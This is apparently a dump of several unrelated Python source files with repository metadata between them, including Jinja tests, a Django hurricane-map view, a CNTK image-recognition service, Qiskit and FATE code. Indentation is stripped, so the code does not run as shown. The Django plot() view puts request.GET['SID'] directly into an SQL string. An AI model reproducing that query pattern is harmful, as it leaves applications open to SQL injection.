t = env.from_string('{{ 3 + missing }}')
with pytest.raises(UndefinedError):
t.render()
def test_cast_int(self, env):
t = env.from_string("{{ anumber|int }}")
result = t.render(anumber='3')
assert isinstance(result, int)
assert result == 3
def test_list_add(self, env):
t = env.from_string("{{ listone + listtwo }}")
result = t.render(listone=['a', 'b'], listtwo=['c', 'd'])
assert isinstance(result, list)
assert result == ['a', 'b', 'c', 'd']
def test_multi_expression_add(self, env):
t = env.from_string("{{ listone }} + {{ listtwo }}")
result = t.render(listone=['a', 'b'], listtwo=['c', 'd'])
assert not isinstance(result, list)
assert result == "['a', 'b'] + ['c', 'd']"
def test_loops(self, env):
t = env.from_string("{% for x in listone %}{{ x }}{% endfor %}")
result = t.render(listone=['a', 'b', 'c', 'd'])
assert isinstance(result, text_type)
assert result == 'abcd'
def test_loops_with_ints(self, env):
t = env.from_string("{% for x in listone %}{{ x }}{% endfor %}")
result = t.render(listone=[1, 2, 3, 4])
assert isinstance(result, int)
assert result == 1234
def test_loop_look_alike(self, env):
t = env.from_string("{% for x in listone %}{{ x }}{% endfor %}")
result = t.render(listone=[1])
assert isinstance(result, int)
assert result == 1
def test_booleans(self, env):
t = env.from_string("{{ boolval }}")
result = t.render(boolval=True)
assert isinstance(result, bool)
assert result is True
t = env.from_string("{{ boolval }}")
result = t.render(boolval=False)
assert isinstance(result, bool)
assert result is False
t = env.from_string("{{ 1 == 1 }}")
result = t.render()
assert isinstance(result, bool)
assert result is True
t = env.from_string("{{ 2 + 2 == 5 }}")
result = t.render()
assert isinstance(result, bool)
assert result is False
t = env.from_string("{{ None == None }}")
result = t.render()
assert isinstance(result, bool)
assert result is True
t = env.from_string("{{ '' == None }}")
result = t.render()
assert isinstance(result, bool)
assert result is False
def test_variable_dunder(self, env):
t = env.from_string("{{ x.__class__ }}")
result = t.render(x=True)
assert isinstance(result, type)
def test_constant_dunder(self, env):
t = env.from_string("{{ true.__class__ }}")
result = t.render()
assert isinstance(result, type)
def test_constant_dunder_to_string(self, env):
t = env.from_string("{{ true.__class__|string }}")
result = t.render()
assert not isinstance(result, type)
assert result in ["<type 'bool'>", "<class 'bool'>"]
def test_string_literal_var(self, env):
t = env.from_string("[{{ 'all' }}]")
result = t.render()
assert isinstance(result, text_type)
assert result == "[all]"
def test_string_top_level(self, env):
t = env.from_string("'Jinja'")
result = t.render()
assert result == 'Jinja'
def test_tuple_of_variable_strings(self, env):
t = env.from_string("'{{ a }}', 'data', '{{ b }}', b'{{ c }}'")
result = t.render(a=1, b=2, c="bytes")
assert isinstance(result, tuple)
assert result == ("1", "data", "2", b"bytes")
def test_concat_strings_with_quotes(self, env):
t = env.from_string("--host='{{ host }}' --user \"{{ user }}\"")
result = t.render(host="localhost", user="Jinja")
assert result == "--host='localhost' --user \"Jinja\""
| 33.721805
| 72
| 0.578149
|
2eabfa96a53cbbab64745aa500f8cdab3988405e
| 1,573
|
py
|
Python
|
django/map/hurricane/views.py
|
hammad93/hurricane-viz
|
2578e846e32527281d9870eb8258e00d12489a82
|
[
"MIT"
] | null | null | null |
django/map/hurricane/views.py
|
hammad93/hurricane-viz
|
2578e846e32527281d9870eb8258e00d12489a82
|
[
"MIT"
] | null | null | null |
django/map/hurricane/views.py
|
hammad93/hurricane-viz
|
2578e846e32527281d9870eb8258e00d12489a82
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
from django.db import connection
from django.shortcuts import render
import json
def index(request):
# see if we have a get request
if request.GET.get('type', False) :
type = request.GET['type']
if type == 'plot' :
return HttpResponse(json.dumps(plot(request)))
else :
return None
with connection.cursor() as cursor:
cursor.execute("SELECT SID,SEASON,NUMBER, BASIN, SUBBASIN, NAME, ISO_TIME, NATURE,LAT, LON, WMO_WIND, WMO_PRES, WMO_AGENCY, TRACK_TYPE, DIST2LAND,LANDFALL from hurricanes limit 10")
results = cursor.fetchall()
with connection.cursor() as cursor:
cursor.execute("select distinct SID, NAME, SUBBASIN, YEAR(CAST(ISO_TIME as date)) as YEAR from hurricanes where NAME not in ('', 'NOT_NAMED') order by NAME")
names = cursor.fetchall()
return render(request, 'index.html', {
'hurricanes': results,
'names': names,
})
def plot(request):
with connection.cursor() as cursor:
cursor.execute(f"select SID, NAME, ISO_TIME, LAT, LON, WMO_WIND, WMO_PRES from hurricanes where SID = '{request.GET['SID']}' order by ISO_TIME")
entries = cursor.fetchall()
results = {
'lat' : [],
'lon' : [],
'wind' : [],
'pressure' : []
}
for entry in entries :
results['lat'].append(entry[3])
results['lon'].append(entry[4])
results['wind'].append(entry[5])
results['pressure'].append(entry[6])
return results
| 35.75
| 189
| 0.619835
|
f859010d4531a7765a2d15b263d7fbae29d300d9
| 4,195
|
py
|
Python
|
test/banana/test_api.py
|
daisuke-fujita/monsaca-analytics_20181107
|
5809e66874d76bd9f102e7694197bd849210fa3b
|
[
"Apache-2.0"
] | 1
|
2021-03-19T04:09:04.000Z
|
2021-03-19T04:09:04.000Z
|
test/banana/test_api.py
|
daisuke-fujita/monsaca-analytics_20181107
|
5809e66874d76bd9f102e7694197bd849210fa3b
|
[
"Apache-2.0"
] | 1
|
2019-01-21T09:44:29.000Z
|
2019-01-21T09:44:29.000Z
|
test/banana/test_api.py
|
daisuke-fujita/monsaca-analytics_20181107
|
5809e66874d76bd9f102e7694197bd849210fa3b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from monasca_analytics.exception.banana import BananaEnvironmentError
from monasca_analytics.exception.banana import BananaInvalidExpression
from monasca_analytics.parsing.api import create_fn_with_config
from monasca_analytics.parsing.api import validate_environment
from monasca_analytics.parsing.api import validate_expression
from monasca_analytics.parsing.api import validate_name_binding
from test.util_for_testing import MonanasTestCase
class TestBananaAPI(MonanasTestCase):
def setUp(self):
super(TestBananaAPI, self).setUp()
def tearDown(self):
super(TestBananaAPI, self).tearDown()
def test_validate_expression_is_valid(self):
validate_expression("a + b")
validate_expression("a * b")
validate_expression("a - b")
validate_expression("a / b")
validate_expression("a / b + 12 * (1 - a)")
def test_validate_expression_is_invalid(self):
self.assertRaises(BananaInvalidExpression, validate_expression,
"a123")
self.assertRaises(BananaInvalidExpression, validate_expression,
"a n + 15")
self.assertRaises(BananaInvalidExpression, validate_expression,
"a * exp(b)")
self.assertRaises(BananaInvalidExpression, validate_expression,
"-a")
self.assertRaises(BananaInvalidExpression, validate_expression,
"- a")
self.assertRaises(BananaInvalidExpression, validate_expression,
"+ b")
def test_validate_name_binding_is_valid(self):
validate_name_binding(
validate_expression("a + b * c"),
{"a": "foo", "b": "foo", "c": "bar"}
)
def test_validate_name_binding_is_invalid(self):
self.assertRaises(BananaInvalidExpression,
validate_name_binding,
validate_expression("a + b * c"),
{"a": "foo", "c": "bar"})
def test_validate_environment_is_valid(self):
validate_environment({"a": "foo", "c": "bar"})
def test_validate_environment_is_invalid(self):
self.assertRaises(BananaEnvironmentError,
validate_environment, {"a": 0})
def test_generated_fn_is_valid(self):
fn = create_fn_with_config({"a": "foo", "b": "bar", "c": "toto"},
"a * b + c")
result = fn({"foo": 12, "bar": 2, "toto": -12})
self.assertEqual(result, 12)
result = fn({"foo": 0, "bar": 42, "toto": 13})
self.assertEqual(result, 13)
result = fn({"foo": 2, "bar": 3, "toto": 5})
self.assertEqual(result, 11)
def test_generated_fn_with_parentheses_in_expr1(self):
fn = create_fn_with_config({"a": "foo", "b": "bar", "c": "toto"},
"(a - b) + c")
result = fn({"foo": 12, "bar": 2, "toto": -12})
self.assertEqual(result, -2)
def test_generated_fn_with_parentheses_in_expr2(self):
fn = create_fn_with_config({"a": "foo", "b": "bar", "c": "toto"},
"a - (b + c)")
result = fn({"foo": 12, "bar": 2, "toto": -12})
self.assertEqual(result, 22)
def test_generated_fn_with_no_parentheses_in_expr(self):
fn = create_fn_with_config({"a": "foo", "b": "bar", "c": "toto"},
"a - b + c")
result = fn({"foo": 12, "bar": 2, "toto": 12})
self.assertEqual(result, 22)
| 41.534653
| 75
| 0.615256
|
6679e0edac31c48c41de8f24cc25cb7374ced788
| 3,943
|
py
|
Python
|
tests/models/data/horovod/train_default_model.py
|
pbsds/pytorch-lightning
|
1eff3b53c1ff9d362fc24a1e4fea6c0cfe78696b
|
[
"Apache-2.0"
] | null | null | null |
tests/models/data/horovod/train_default_model.py
|
pbsds/pytorch-lightning
|
1eff3b53c1ff9d362fc24a1e4fea6c0cfe78696b
|
[
"Apache-2.0"
] | null | null | null |
tests/models/data/horovod/train_default_model.py
|
pbsds/pytorch-lightning
|
1eff3b53c1ff9d362fc24a1e4fea6c0cfe78696b
|
[
"Apache-2.0"
] | null | null | null |
"""This script is meant to be executed from `../../test_horovod.py`.
Because Horovod uses a parallel programming model similar to MPI, unit tests for collective
ops like allreduce need to be run in parallel. The most common approach for running parallel
Horovod workers is to launch multiple replicas of the training script via the `horovodrun`
command-line tool:
.. code-block:: bash
horovodrun -np 2 python train_default_model.py ...
Individual test parameters are configured by the serialized `--trainer-options` JSON object.
An non-zero exit code from this script on any rank will indicate failure, while a zero exit code
across all ranks indicates success.
"""
import argparse
import json
import os
import sys
import torch
# this is needed because Conda does not use `PYTHONPATH` env var while pip and virtualenv do
PYTHONPATH = os.getenv("PYTHONPATH", "")
if ":" in PYTHONPATH:
sys.path = PYTHONPATH.split(":") + sys.path
from pytorch_lightning import Trainer # noqa: E402
from pytorch_lightning.callbacks import ModelCheckpoint # noqa: E402
from pytorch_lightning.utilities import _HOROVOD_AVAILABLE # noqa: E402
if _HOROVOD_AVAILABLE:
import horovod.torch as hvd
else:
print("You requested to import Horovod which is missing or not supported for your OS.")
from tests.helpers import BoringModel # noqa: E402
from tests.helpers.utils import reset_seed, set_random_main_port # noqa: E402
parser = argparse.ArgumentParser()
parser.add_argument("--trainer-options", required=True)
parser.add_argument("--on-gpu", action="store_true", default=False)
def run_test_from_config(trainer_options, on_gpu, check_size=True):
"""Trains the default model with the given config."""
set_random_main_port()
reset_seed()
ckpt_path = trainer_options["default_root_dir"]
trainer_options.update(callbacks=[ModelCheckpoint(dirpath=ckpt_path)])
class TestModel(BoringModel):
def on_train_start(self) -> None:
expected_device = torch.device("cuda", self.trainer.local_rank) if on_gpu else torch.device("cpu")
assert self.device == expected_device
def training_epoch_end(self, outputs) -> None:
res = self.trainer.strategy.reduce(torch.tensor(1.0, device=self.device), reduce_op="sum")
assert res.sum() == self.trainer.strategy.world_size
model = TestModel()
trainer = Trainer(**trainer_options)
trainer.fit(model)
assert trainer.state.finished, f"Training failed with {trainer.state}"
trainer.test(model)
assert model.device == torch.device("cpu")
# Horovod should be initialized following training. If not, this will raise an exception.
if check_size:
assert hvd.size() == 2
if trainer.global_rank > 0:
return
# test model loading
pretrained_model = BoringModel.load_from_checkpoint(trainer.checkpoint_callback.best_model_path)
# test new model accuracy
test_loaders = model.test_dataloader()
if not isinstance(test_loaders, list):
test_loaders = [test_loaders]
for dataloader in test_loaders:
batch = next(iter(dataloader))
pretrained_model(batch)
# test HPC saving
# save logger to make sure we get all the metrics
if trainer.logger:
trainer.logger.finalize("finished")
hpc_save_path = trainer._checkpoint_connector.hpc_save_path(ckpt_path)
trainer.save_checkpoint(hpc_save_path)
# test HPC loading
checkpoint_path = trainer._checkpoint_connector._CheckpointConnector__get_max_ckpt_path_from_folder(ckpt_path)
trainer._checkpoint_connector.restore(checkpoint_path)
if on_gpu:
trainer = Trainer(gpus=1, strategy="horovod", max_epochs=1)
# test root gpu index
assert trainer.strategy.root_device.index == hvd.local_rank()
if __name__ == "__main__":
args = parser.parse_args()
run_test_from_config(json.loads(args.trainer_options), args.on_gpu)
| 35.522523
| 114
| 0.737002
|
6786335852c5aa3b95336c148e16ca62444fd15a
| 909
|
py
|
Python
|
tests/twitter_learning_journal/controllers/test_login.py
|
DEV3L/twitter-learning-journal
|
a51d22a60a3d1249add352d8357975a7f2db585c
|
[
"Beerware"
] | 1
|
2021-01-12T17:06:57.000Z
|
2021-01-12T17:06:57.000Z
|
tests/twitter_learning_journal/controllers/test_login.py
|
DEV3L/twitter-learning-journal
|
a51d22a60a3d1249add352d8357975a7f2db585c
|
[
"Beerware"
] | null | null | null |
tests/twitter_learning_journal/controllers/test_login.py
|
DEV3L/twitter-learning-journal
|
a51d22a60a3d1249add352d8357975a7f2db585c
|
[
"Beerware"
] | 1
|
2018-07-31T21:16:33.000Z
|
2018-07-31T21:16:33.000Z
|
import os
import tempfile
import unittest
from app.twitter_learning_journal.database.sqlalchemy_database import build_tables, Database
from server import app
class FlaskrTestCase(unittest.TestCase):
def setUp(self):
self.db_fd, app.config['DATABASE'] = tempfile.mkstemp()
app.testing = True
self.app = app.test_client()
self.database = Database()
with app.app_context():
build_tables(self.database)
def tearDown(self):
os.close(self.db_fd)
os.unlink(app.config['DATABASE'])
def test_login_endpoint_exists(self):
expected_response_code = 200
username = 'username'
password = 'password'
response = self.app.post('/login', data=dict(
username=username,
password=password
), follow_redirects=True)
assert expected_response_code == response.status_code
| 25.971429
| 92
| 0.661166
|
89ecb8693e5ab8de91f2491f159adaaf3609b92e
| 3,379
|
py
|
Python
|
services/cntk-image-recon/service/image_recon.py
|
arturgontijo/dnn-model-services
|
b5b1453a1e933bdc79451f172873f31fb7fd9842
|
[
"MIT"
] | 26
|
2018-12-14T20:02:07.000Z
|
2021-10-07T19:39:16.000Z
|
services/cntk-image-recon/service/image_recon.py
|
arturgontijo/dnn-model-services
|
b5b1453a1e933bdc79451f172873f31fb7fd9842
|
[
"MIT"
] | 73
|
2018-08-09T17:13:21.000Z
|
2022-03-12T00:03:16.000Z
|
services/cntk-image-recon/service/image_recon.py
|
arturgontijo/dnn-model-services
|
b5b1453a1e933bdc79451f172873f31fb7fd9842
|
[
"MIT"
] | 33
|
2018-10-24T10:45:48.000Z
|
2022-03-19T05:39:48.000Z
|
# Import CNTK
import cntk
import numpy as np
from PIL import Image
import os
import time
import requests
import base64
import logging
import datetime
import hashlib
import traceback
logging.basicConfig(level=10, format="%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s")
log = logging.getLogger("cntk_image_recon")
resources_root = os.path.join("..", "..", "utils", "Resources")
# Evaluates a single image using the re-trained model
def eval_single_image(loaded_model, image_path, image_dims):
# Load and format image (resize, RGB -> BGR, CHW -> HWC)
try:
img = Image.open(image_path)
if image_path.endswith("png"):
temp = Image.new("RGB", img.size, (255, 255, 255))
temp.paste(img, img)
img = temp
resized = img.resize((image_dims[2], image_dims[1]), Image.ANTIALIAS)
bgr_image = np.asarray(resized, dtype=np.float32)[..., [2, 1, 0]]
hwc_format = np.ascontiguousarray(np.rollaxis(bgr_image, 2))
# Compute model output
arguments = {loaded_model.arguments[0]: [hwc_format]}
output = loaded_model.eval(arguments)
# Return softmax probabilities
sm = cntk.softmax(output[0])
return sm.eval()
except FileNotFoundError:
log.error("Could not open (skipping file): ", image_path)
return ["None"]
def image_recognition(method, model, map_names, img_path, image_dims):
try:
tmp_img_file = generate_uid() + ".jpg"
# Link
if "http://" in img_path or "https://" in img_path:
header = {'User-Agent': 'Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:9.0) Gecko/20100101 Firefox/10.0'}
r = requests.get(img_path, headers=header, allow_redirects=True)
with open(tmp_img_file, "wb") as my_f:
my_f.write(r.content)
img_path = tmp_img_file
# Base64
elif len(img_path) > 500:
img_data = base64.b64decode(img_path)
with open(tmp_img_file, "wb") as f:
f.write(img_data)
img_path = tmp_img_file
model_file = os.path.join(resources_root, "Models", "{}_{}_20.model".format(method, model))
if model == "AlexNet":
image_dims = (3, 227, 227)
elif model == "InceptionV3":
image_dims = (3, 299, 299)
start_time = time.time()
trained_model = cntk.load_model(model_file)
probs = eval_single_image(trained_model, img_path, image_dims)
top_5_dict = {}
p_array = probs.argsort()[-5:][::-1]
for i, prob in enumerate(p_array):
perc = probs[prob] * 100
top_5_dict[i + 1] = "{0:05.2f}%: {1}".format(perc, map_names[int(prob)])
delta_time = time.time() - start_time
if os.path.exists(tmp_img_file):
os.remove(tmp_img_file)
return {"delta_time": "{:.4f}".format(delta_time), "top_5": top_5_dict}
except Exception as e:
log.error(e)
traceback.print_exc()
return {"delta_time": "Fail", "top_5": "Fail", "error": str(e)}
def generate_uid():
# Setting a hash accordingly to the timestamp
seed = "{}".format(datetime.datetime.now())
m = hashlib.sha256()
m.update(seed.encode("utf-8"))
m = m.hexdigest()
# Returns only the first and the last 10 hex
return m[:10] + m[-10:]
| 33.455446
| 115
| 0.606688
|
116cca3ce2b1986ccd53e66a94d371828412c04a
| 2,526
|
py
|
Python
|
application/models/environment.py
|
opengovt/openroads-geostore
|
336bdc352252ae34a66746e632ae0b8df66c04c0
|
[
"MIT"
] | 1
|
2019-10-11T14:43:53.000Z
|
2019-10-11T14:43:53.000Z
|
application/models/environment.py
|
opengovt/openroads-geostore
|
336bdc352252ae34a66746e632ae0b8df66c04c0
|
[
"MIT"
] | null | null | null |
application/models/environment.py
|
opengovt/openroads-geostore
|
336bdc352252ae34a66746e632ae0b8df66c04c0
|
[
"MIT"
] | null | null | null |
import time
import datetime
from google.appengine.ext import ndb
from application.models.syslog import SysLog
class Environment(SysLog):
created = ndb.DateTimeProperty(auto_now_add=True)
updated = ndb.DateTimeProperty(auto_now=True)
owner = ndb.KeyProperty(kind='User')
users = ndb.KeyProperty(repeated=True)
description = ndb.TextProperty()
title = ndb.StringProperty()
invited_users = ndb.StringProperty(repeated=True)
user_groups = ndb.KeyProperty(repeated=True)
users_email = ndb.StringProperty(repeated=True)
private = ndb.BooleanProperty(default=True)
def to_object(self):
data = {}
created = self.created
created += datetime.timedelta(hours=8)
data["created_time"] = created.strftime("%b %d, %Y %I:%M:%S %p")
data['created'] = time.mktime(created.timetuple())
data['updated'] = time.mktime(self.updated.timetuple())
data['users'] = [user.urlsafe() for user in self.users]
data['title'] = self.title
data['description'] = self.description
data['key'] = self.key.urlsafe()
data['id'] = str(self.key.id())
data['members'] = []
data['invited_users'] = self.invited_users
data['users_email'] = self.users_email
data['user_groups'] = []
data['user_groups_list'] = []
data['private_setting'] = self.private
data['owner'] = self.owner.get().to_object()
if self.user_groups:
for g in self.user_groups:
if g:
data['user_groups'].append(g.id())
group = g.get()
if group:
data['user_groups_list'].append(group.to_object())
if self.users:
for u in self.users:
user = u.get()
if user:
data['members'].append(user.to_object())
return data
def to_api_object(self):
data = {}
created = self.created
created += datetime.timedelta(hours=8)
data["created_time"] = created.strftime("%b %d, %Y %I:%M:%S %p")
data['created'] = time.mktime(created.timetuple())
data['updated'] = time.mktime(self.updated.timetuple())
data['title'] = self.title
data['description'] = self.description
data['key'] = self.key.urlsafe()
data['id'] = str(self.key.id())
data['users_email'] = self.users_email
data['private_setting'] = self.private
return data
| 35.577465
| 74
| 0.586698
|
5443ce4263178c8f1f5c0edd13533237274c35a8
| 5,295
|
py
|
Python
|
data/p3BR/R1/benchmark/startQiskit_QC32.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p3BR/R1/benchmark/startQiskit_QC32.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p3BR/R1/benchmark/startQiskit_QC32.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=6
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.rx(-0.09738937226128368,input_qubit[2]) # number=2
prog.h(input_qubit[1]) # number=3
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
sample_shot =4000
writefile = open("../data/startQiskit_QC32.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_belem")
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
circuit1.measure_all()
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 28.777174
| 140
| 0.628329
|
0161d3f232849a90f7a436dc669557498fa64e44
| 648
|
py
|
Python
|
data-structures-implementation/linked-list/remove-kth-last-element-from-linked-list.py
|
ardakkk/Algorithms-and-Data-Structures
|
c428bb0bd7eeb6c34448630f88f13e1329b54636
|
[
"MIT"
] | null | null | null |
data-structures-implementation/linked-list/remove-kth-last-element-from-linked-list.py
|
ardakkk/Algorithms-and-Data-Structures
|
c428bb0bd7eeb6c34448630f88f13e1329b54636
|
[
"MIT"
] | null | null | null |
data-structures-implementation/linked-list/remove-kth-last-element-from-linked-list.py
|
ardakkk/Algorithms-and-Data-Structures
|
c428bb0bd7eeb6c34448630f88f13e1329b54636
|
[
"MIT"
] | null | null | null |
class Node:
def __init__(self, val, next):
self.val = val
self.next = next
def __str__(self):
n = self
answer = ''
while n:
answer += str(n.val)
n = n.next
return answer
# Time: O(n)
# Space: O(n)
def remove_kth_from_linked_list(node, k):
slow, fast = node, node
for i in range(k):
fast = fast.next
prev = None
while fast:
prev = slow
fast = fast.next
slow = slow.next
prev.next = slow.next
return node
head = Node(1, Node(2, Node(3, Node(4, Node(5, None)))))
remove_kth_from_linked_list(head, 3)
print(head)
| 20.903226
| 56
| 0.54321
|
43c2adaeeac5ca89807769188cbd811e3a11dbc2
| 12,499
|
py
|
Python
|
federatedml/optim/gradient/hetero_linear_model_gradient.py
|
peiyong86/FATE
|
efae2b1add20d9f98ac05a669298e36369f91497
|
[
"Apache-2.0"
] | 1
|
2019-10-16T12:18:06.000Z
|
2019-10-16T12:18:06.000Z
|
federatedml/optim/gradient/hetero_linear_model_gradient.py
|
peiyong86/FATE
|
efae2b1add20d9f98ac05a669298e36369f91497
|
[
"Apache-2.0"
] | 9
|
2020-01-28T23:05:25.000Z
|
2022-02-10T00:31:01.000Z
|
federatedml/optim/gradient/hetero_linear_model_gradient.py
|
peiyong86/FATE
|
efae2b1add20d9f98ac05a669298e36369f91497
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import numpy as np
from arch.api.utils import log_utils
from federatedml.util import consts
from federatedml.util import fate_operator
LOGGER = log_utils.getLogger()
def __compute_partition_gradient(data, fit_intercept=True):
"""
Compute hetero regression gradient for:
gradient = ∑d*x, where d is fore_gradient which differ from different algorithm
Parameters
----------
data: DTable, include fore_gradient and features
fit_intercept: bool, if model has interception or not. Default True
Returns
----------
numpy.ndarray
hetero regression model gradient
"""
feature = []
fore_gradient = []
for key, value in data:
feature.append(value[0])
fore_gradient.append(value[1])
feature = np.array(feature)
fore_gradient = np.array(fore_gradient)
gradient = []
if feature.shape[0] <= 0:
return 0
for j in range(feature.shape[1]):
feature_col = feature[:, j]
gradient_j = fate_operator.dot(feature_col, fore_gradient)
gradient.append(gradient_j)
if fit_intercept:
bias_grad = np.sum(fore_gradient)
gradient.append(bias_grad)
return np.array(gradient)
def compute_gradient(data_instances, fore_gradient, fit_intercept):
"""
Compute hetero-regression gradient
Parameters
----------
data_instances: DTable, input data
fore_gradient: DTable, fore_gradient
fit_intercept: bool, if model has intercept or not
Returns
----------
DTable
the hetero regression model's gradient
"""
feat_join_grad = data_instances.join(fore_gradient,
lambda d, g: (d.features, g))
f = functools.partial(__compute_partition_gradient,
fit_intercept=fit_intercept)
gradient_partition = feat_join_grad.mapPartitions(f).reduce(lambda x, y: x + y)
gradient = gradient_partition / data_instances.count()
return gradient
class Guest(object):
def __init__(self):
self.host_forwards = None
self.forwards = None
self.aggregated_forwards = None
def _register_gradient_sync(self, host_forward_transfer, fore_gradient_transfer,
guest_gradient_transfer, guest_optim_gradient_transfer):
self.host_forward_transfer = host_forward_transfer
self.fore_gradient_transfer = fore_gradient_transfer
self.unilateral_gradient_transfer = guest_gradient_transfer
self.unilateral_optim_gradient_transfer = guest_optim_gradient_transfer
def compute_and_aggregate_forwards(self, data_instances, model_weights,
encrypted_calculator, batch_index, offset=None):
raise NotImplementedError("Function should not be called here")
def compute_gradient_procedure(self, data_instances, encrypted_calculator, model_weights, optimizer,
n_iter_, batch_index, offset=None):
"""
Linear model gradient procedure
Step 1: get host forwards which differ from different algorithm
For Logistic Regression and Linear Regression: forwards = wx
For Poisson Regression, forwards = exp(wx)
Step 2: Compute self forwards and aggregate host forwards and get d = fore_gradient
Step 3: Compute unilateral gradient = ∑d*x,
Step 4: Send unilateral gradients to arbiter and received the optimized and decrypted gradient.
"""
current_suffix = (n_iter_, batch_index)
self.host_forwards = self.get_host_forward(suffix=current_suffix)
fore_gradient = self.compute_and_aggregate_forwards(data_instances, model_weights,
encrypted_calculator, batch_index, offset)
self.remote_fore_gradient(fore_gradient, suffix=current_suffix)
unilateral_gradient = compute_gradient(data_instances,
fore_gradient,
model_weights.fit_intercept)
if optimizer is not None:
unilateral_gradient = optimizer.add_regular_to_grad(unilateral_gradient, model_weights)
optimized_gradient = self.update_gradient(unilateral_gradient, suffix=current_suffix)
return optimized_gradient, fore_gradient, self.host_forwards
def get_host_forward(self, suffix=tuple()):
